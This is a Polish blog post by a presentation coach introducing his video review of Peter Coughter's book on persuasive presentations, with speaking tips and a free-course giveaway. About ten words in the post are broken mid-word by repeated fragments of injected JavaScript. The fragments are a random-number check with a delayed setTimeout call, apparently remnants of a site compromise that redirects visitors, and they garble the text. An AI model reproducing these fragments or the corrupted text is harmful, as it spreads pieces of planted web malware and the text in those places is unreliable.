234 strony inspiracji dla mówców

Po długiej przerwie w nagrywaniu filmów, dziś zapraszam Cię do obejrzenia mojej najnowszej produkcji 😉 Film do najkrótszych nie należy (9 minut) ale po blisko 2-letniej przerwie w videoblogowaniu nie mogłem sobie odmówić skorzystania z dłuższej formy wypowiedzi!

Z tego nagrania dowiesz się między innymi:

1 min. 10 sek. Jakie cztery pytania musisz sobie zadać przed przystąpieniem do pracy nad prezentacją  (i na nie odpowiedzieć, oczywiście) aby napisać ją z przyjemnością i wygłosić bez stresu! Prosta medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toda na wyniesienie swojego przemawiania na wyższy poziom…

3 min. 35 sek. co zrobić aby za darmo, free, bezpłatnie otrzymać dostęp do wartego 97 zł mojego kursu Tajna Księga Mówców KLIK

5 min 10 sek. UWAGA: chcę mieć Twoje zdjęcie z… sypialni!!! Po co? obejrzyj film 😉

5min. 56 sek Jaka jedna rzecz sprawi, że ludzie pokochają Cię jako mówcę

A teraz już zapraszam na film (Transkrypt nagrania masz pod okienkiem z nagraniem z YT)

Transkrypcja nagrania i linki do materiałów, które omawiam w video:

Tak naprawdę na filmie mówię dużo, dużo więcej, zatem zachęcam do obejrzenia nagrania!

Dziś namawiam Cię do przeczytania książki, która na cała lata dostarczy Ci wiedzy i inspiracji jeśli chodzi o wystąpienia publiczne oraz tworzenie i wygłaszanie prezentacji. Książka ta każdego dnia będzie Ci podpowiadać, jak pracować nad prezentacjami, a także pozwoli Ci spojrzeć na Twoje dokonania na tym polu z innej perspektywy. Znajdziesz w niej mnóstwo pomysłów, jak i odkryjesz na nowo “stare zasady” rządzące prezentacjami.

Ta książka dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to “Sztuka perswazji i Skuteczne techniki prezentacji”, której audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torem jest Peter Coughter, Amerykanim od blisko pół wieku zajmujący się reklamą pracując dla największych amerykańskich agencji reklamowych. Obecnie ma swoją firmę konsultingową. Wykłada też na kilku uczelniach wyższych w USA i uczy studentów jak wygłaszać prezentacje, które sprzedają.

UWAGA: Książkę otrzymałem od wydawnictwa Studio Emka z prośbą o napisanie/nagranie recenzji. Na dole, pod tekstem znajdziesz link do strony z tą książką, gdzie możesz ją kupić. To nie jest mój link partnerski. Ja nie zarabiam grosza na tym, że Ty kupisz tę książkę. Nie otrzymuję też wynagrodzenia za tę recenzję. Polecam Ci ją, bo jest świetna, po prostu

Jeśli chodzi o pomysły, odom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pierwszy z brzegu: Cztery pytania, które powinieneś zadać sobie zanim usiądziesz do pisania swojej prezentacji:
1. Co mi się podoba w prezentacjach?
2. Czego nie znoszę?
3. Co wydawałoby mi się interesujące albo zabawne?
4. Co by mnie nudziło?
Jak widzisz, musisz wstawić się w rolę swojego widza i zasdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosować zasadę: “Nie czyń drugiemu co Tobie niemiłe”. Zasdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowanie się do niej pozwoli Ci wznieść swoje wystąpienia na wyższy poziom.

Jeśli zaś chodzi o “stare prawdy” dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:
prawda nr 1. Sam świetny produkt, usługa i pomysł nie wystarczą. Potrzebna jest jeszcze odpowiednia prezentacja aby je sprzedać.
Prawda nr 2. Prezentacje, a właściwie ich tworzenie, wymaga ogromnego zaangażowania w ten proces, ale ten trud zwróci Ci się wielokrotnie!

I na koniec bardzo ważna, jeśli nie najważniejsza kwestia, o której częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zapominają osoby wygłaszające prezentacje: Podczas wystąpienia koniecznie musisz pozostać sobą. Nie udawaj kogoś innego, nie chowaj się za maską, nie dogrywaj roli. Ludzie chcą autentycznych, szczerych mówców którzy dadzą publiczności … siebie! jeśli będziesz z widzami szczery, oni Cię pokochają! Uwierz mi 😉

Na zakończenie mam dla Ciebie propozycję, dzięki której możesz całkowicie za darmo wejść w posiadanie mojego kursy Tajna Księga Mówców, wartego 97 zł:
1. Kup książkę Petera Coughtera w internecie lub w księgarni (jest w EMPiKu).
2. Zrób sobie z nią zdjęcie 😉
3. Opublikuj swoją fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografię z książką na Facebooku i prześlij link lub fotkę bezpośrednio do mnie rwazynski[malpka]gmail.com

Szczegóły tej propozycji na filmie, a linki potrzebne do akcji masz poniżej.

Link do strony internedom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towej Studio Emka z książką “Sztuka Perswazji i Skuteczne techniki prezentacji”
http://www.studioemka.com.pl/index.php?page=p&id=515

Link do strony z kursem Tajna Księga Mówców
http://tajna-ksiega-mowcow.interkursy.pl/

pozdrawiam
Robert Ważyński

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply